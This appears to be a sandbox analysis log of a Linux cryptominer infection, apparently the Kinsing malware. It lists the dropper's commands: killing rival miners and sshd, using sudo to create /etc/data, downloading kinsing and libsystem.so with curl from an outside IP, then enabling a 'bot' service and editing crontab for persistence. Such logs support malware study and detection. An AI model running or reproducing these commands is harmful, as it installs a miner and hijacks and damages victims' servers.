/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1442
-
-
/bin/grepgrep exe2⤵PID:1445
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1444
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1447
-
-
/usr/bin/idid -u2⤵PID:1448
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1449 -
/usr/sbin/sendmailsendmail -t3⤵PID:1452
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmNL2-0000NQ-Fk4⤵
- Reads CPU attributes
PID:1465
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1455
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmNL2-0000NT-GW4⤵
- Reads CPU attributes
PID:1466
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1456
-
-
-
/usr/bin/idid -u2⤵PID:1457
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1458
-
-
/bin/unameuname -m2⤵PID:1459
-
-
/bin/grepgrep -e /dev2⤵PID:1462
-
-
/bin/lsls -la /etc/data2⤵PID:1461
-
-
/bin/grepgrep -v grep2⤵PID:1463
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
PID:1464
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
PID:1467
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1469
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
PID:1470
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1471
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1472
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1475
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1476
-
-
/bin/grepgrep :14142⤵PID:1478
-
-
/bin/grepgrep -v -2⤵PID:1481
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1482
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1480
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1479
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1487
-
-
/bin/grepgrep -v grep2⤵PID:1485
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1484
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1486
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1483
-
-
/bin/grepgrep -v grep2⤵PID:1490
-
-
/bin/grepgrep stratum2⤵PID:1489
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1491
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1492
-
-
/bin/psps ax2⤵
- Reads runtime system information
PID:1488
-
-
/bin/grepgrep -v grep2⤵PID:1495
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1496
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1497
-
-
/bin/grepgrep Sofia2⤵PID:1494
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1493
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1498
-
-
/bin/grepgrep -v grep2⤵PID:1501
-
-
/bin/grepgrep tracepath2⤵PID:1500
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1502
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1503
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1499
-
-
/bin/grepgrep /dot2⤵PID:1505
-
-
/bin/grepgrep -v grep2⤵PID:1506
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1504
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1507
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1508
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1512
-
-
/bin/grepgrep -v grep2⤵PID:1511
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1513
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1510
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1509
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1515
-
-
/bin/grepgrep -v grep2⤵PID:1516
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1517
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1514
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1518
-
-
/bin/grepgrep -v grep2⤵PID:1521
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1522
-
-
/bin/grepgrep "bash -k"2⤵PID:1520
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1523
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1519
-
-
/bin/grepgrep perfctl2⤵PID:1525
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1524
-
-
/bin/grepgrep -v grep2⤵PID:1526
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1527
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1528
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1529
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
PID:1530
-
-
/bin/grepgrep -v grep2⤵PID:1533
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1535
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1534
-
-
/bin/grepgrep ./ll12⤵PID:1532
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1531
-
-
/bin/grepgrep -v grep2⤵PID:1538
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1539
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1540
-
-
/bin/grepgrep agetty2⤵PID:1537
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1536
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1541
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1545
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1544
-
-
/bin/grepgrep -v -2⤵PID:1546
-
-
/bin/grepgrep 207.38.87.62⤵PID:1543
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1547
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1551
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1550
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1549
-
-
/bin/grepgrep -v -2⤵PID:1552
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1553
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1556
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1557
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1555
-
-
/bin/grepgrep -v -2⤵PID:1558
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1559
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1563
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1562
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1561
-
-
/bin/grepgrep -v -2⤵PID:1564
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1565
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1568
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1569
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1567
-
-
/bin/grepgrep -v -2⤵PID:1570
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1571
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
PID:1572
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1573
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
PID:1574
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
PID:1575
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
PID:1576
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
PID:1577
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1578
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1580
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1581
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1582
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1583
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1584
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1585
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1586
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
PID:1587
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
PID:1588
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1589
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1590
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1591
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1592
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1593
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1594
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1595
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1596
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
PID:1597
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1598
-
-
/bin/grepgrep -v grep2⤵PID:1601
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1602
-
-
/bin/grepgrep ./udp2⤵PID:1600
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1603
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1599
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1604
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1606
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1605
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1607
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1608
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1609
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1610
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1611
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1612
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1613
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1614
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1615
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1616
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1618
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1617
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1619
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1621
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1620
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1622
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1623
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1624
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1625
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1627
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1626
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1628
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1630
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1629
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1631
-
-
/bin/catcat /data/./oka.pid2⤵PID:1632
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1633
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1634
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1636
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1635
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1637
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1639
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1638
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
PID:1640
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
PID:1641
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1642
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1643
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1644
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads runtime system information
PID:1645
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1646
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1650
-
-
/bin/grepgrep -v grep2⤵PID:1649
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1651
-
-
/bin/grepgrep ./oka2⤵PID:1648
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1647
-
-
/bin/grepgrep -v grep2⤵PID:1654
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1653
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1652
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1655
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1656
-
-
/bin/grepgrep -v bin2⤵PID:1659
-
-
/bin/grepgrep -v "\\["2⤵PID:1660
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1658
-
-
/bin/grepgrep -v "("2⤵PID:1661
-
-
/bin/grepgrep -v php-fpm2⤵PID:1662
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
PID:1657
-
-
/bin/grepgrep -v proxymap2⤵PID:1663
-
-
/bin/grepgrep -v postgres2⤵PID:1664
-
-
/bin/grepgrep -v postgrey2⤵PID:1665
-
-
/bin/grepgrep -v kinsing2⤵PID:1666
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1667
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1668
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1670
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1669
-
-
/bin/grepgrep -v bin2⤵PID:1671
-
-
/bin/grepgrep -v "\\["2⤵PID:1672
-
-
/bin/grepgrep -v "("2⤵PID:1673
-
-
/bin/grepgrep -v php-fpm2⤵PID:1674
-
-
/bin/grepgrep -v proxymap2⤵PID:1675
-
-
/bin/grepgrep -v postgres2⤵PID:1676
-
-
/bin/grepgrep -v postgrey2⤵PID:1677
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1678
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1679
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1681
-
-
/bin/grepgrep -v bin2⤵PID:1682
-
-
/bin/grepgrep -v "\\["2⤵PID:1683
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1680
-
-
/bin/grepgrep -v "("2⤵PID:1684
-
-
/bin/grepgrep -v php-fpm2⤵PID:1685
-
-
/bin/grepgrep -v proxymap2⤵PID:1686
-
-
/bin/grepgrep -v postgres2⤵PID:1687
-
-
/bin/grepgrep -v postgrey2⤵PID:1688
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1689
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1690
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1693
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1694
-
-
/bin/grepgrep -v grep2⤵PID:1692
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1695
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1691
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1699
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1698
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1700
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1701
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1702
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1703
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1707
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1706
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1710
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1711
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1712
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1713
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1714
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1717
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1718
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1719
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1720
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1721
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1725
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1724
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1726
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1727
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1728
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1729
-
-
/usr/bin/idid -u2⤵PID:1731
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1732
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1745
-
-
/bin/sedsed /base64/d2⤵PID:1750
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1751
-
-
/usr/bin/crontabcrontab -l2⤵PID:1749
-
-
/bin/sedsed /_cron/d2⤵PID:1753
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1754
-
-
/usr/bin/crontabcrontab -l2⤵PID:1752
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1756
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1757
-
-
/usr/bin/crontabcrontab -l2⤵PID:1755
-
-
/bin/sedsed /update.sh/d2⤵PID:1759
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1760
-
-
/usr/bin/crontabcrontab -l2⤵PID:1758
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1763
-
-
/bin/sedsed /logo4/d2⤵PID:1762
-
-
/usr/bin/crontabcrontab -l2⤵PID:1761
-
-
/bin/sedsed /logo9/d2⤵PID:1765
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1766
-
-
/usr/bin/crontabcrontab -l2⤵PID:1764
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1769
-
-
/bin/sedsed /logo0/d2⤵PID:1768
-
-
/usr/bin/crontabcrontab -l2⤵PID:1767
-
-
/bin/sedsed /logo/d2⤵PID:1771
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1772
-
-
/usr/bin/crontabcrontab -l2⤵PID:1770
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1775
-
-
/bin/sedsed /tor2web/d2⤵PID:1774
-
-
/usr/bin/crontabcrontab -l2⤵PID:1773
-
-
/bin/sedsed /jpg/d2⤵PID:1777
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1778
-
-
/usr/bin/crontabcrontab -l2⤵PID:1776
-
-
/bin/sedsed /png/d2⤵PID:1780
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1781
-
-
/usr/bin/crontabcrontab -l2⤵PID:1779
-
-
/bin/sedsed /tmp/d2⤵PID:1783
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1784
-
-
/usr/bin/crontabcrontab -l2⤵PID:1782
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1787
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1786
-
-
/usr/bin/crontabcrontab -l2⤵PID:1785
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1789
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1790
-
-
/usr/bin/crontabcrontab -l2⤵PID:1788
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1792
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1793
-
-
/usr/bin/crontabcrontab -l2⤵PID:1791
-
-
/bin/sedsed /pastebin/d2⤵PID:1795
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1796
-
-
/usr/bin/crontabcrontab -l2⤵PID:1794
-
-
/bin/sedsed /onion/d2⤵PID:1798
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1799
-
-
/usr/bin/crontabcrontab -l2⤵PID:1797
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1801
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1802
-
-
/usr/bin/crontabcrontab -l2⤵PID:1800
-
-
/bin/sedsed /shuf/d2⤵PID:1804
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1805
-
-
/usr/bin/crontabcrontab -l2⤵PID:1803
-
-
/bin/sedsed /ash/d2⤵PID:1807
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1808
-
-
/usr/bin/crontabcrontab -l2⤵PID:1806
-
-
/bin/sedsed /mr.sh/d2⤵PID:1810
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1811
-
-
/usr/bin/crontabcrontab -l2⤵PID:1809
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1814
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1813
-
-
/usr/bin/crontabcrontab -l2⤵PID:1812
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1816
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1817
-
-
/usr/bin/crontabcrontab -l2⤵PID:1815
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1819
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1820
-
-
/usr/bin/crontabcrontab -l2⤵PID:1818
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1822
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1823
-
-
/usr/bin/crontabcrontab -l2⤵PID:1821
-
-
/usr/bin/crontabcrontab -l2⤵PID:1827
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1829
-
-
/bin/sedsed /github/d2⤵PID:1828
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1831
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1832
-
-
/usr/bin/crontabcrontab -l2⤵PID:1830
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1834
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1835
-
-
/usr/bin/crontabcrontab -l2⤵PID:1833
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1837
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1838
-
-
/usr/bin/crontabcrontab -l2⤵PID:1836
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1841
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1840
-
-
/usr/bin/crontabcrontab -l2⤵PID:1839
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1843
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1844
-
-
/usr/bin/crontabcrontab -l2⤵PID:1842
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1846
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1847
-
-
/usr/bin/crontabcrontab -l2⤵PID:1845
-
-
